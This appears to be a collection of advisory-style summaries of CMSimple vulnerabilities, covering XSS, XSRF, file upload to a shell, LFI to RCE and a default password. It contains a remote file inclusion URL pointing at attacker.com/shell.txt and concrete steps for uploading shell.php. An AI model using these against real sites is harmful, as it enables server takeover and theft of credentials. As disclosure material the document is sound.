The vulnerability allows an attacker to execute arbitrary commands on the target system by uploading a malicious PHP file. By appending ",php" to the end of the Extensions_userfiles field in the CMS Settings, an attacker can upload a shell.php file via the Media section and access it remotely.
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.
Several XSRF vulnerabilities existed in this CMS. An attacker can use them to change the admin password, change the user type, or deface the website.
Because the application filters user input with preg_replace, attackers are able to bypass the restriction by using HTML to Unicode encoding. The application therefore lets an attacker perform DOM-based XSS.
CMSimple 5.4 is vulnerable to Local file inclusion (LFI) to Remote code execution (RCE) when an authenticated user is present. An attacker can exploit this vulnerability by changing the functions_file parameter to php://input and sending a malicious payload to the server. This will allow the attacker to execute arbitrary code on the server.
CMSimple 3.1 is vulnerable to Local File Inclusion and Arbitrary File Upload. An attacker can exploit this vulnerability to gain access to sensitive information and upload malicious files on the server.
A vulnerability in CMSimple 5.4 allows an authenticated user to execute arbitrary code on the target system. This is achieved by sending a crafted POST request to the target system with a malicious payload. The payload is then executed on the target system.
CMSimple is prone to multiple security vulnerabilities, including arbitrary PHP code-execution vulnerabilities, a weak authentication security-bypass vulnerability, and other security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application. This may aid in further attacks. Additionally, any user can log in to the CMSimple website with the default password 'test' and no username.
CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.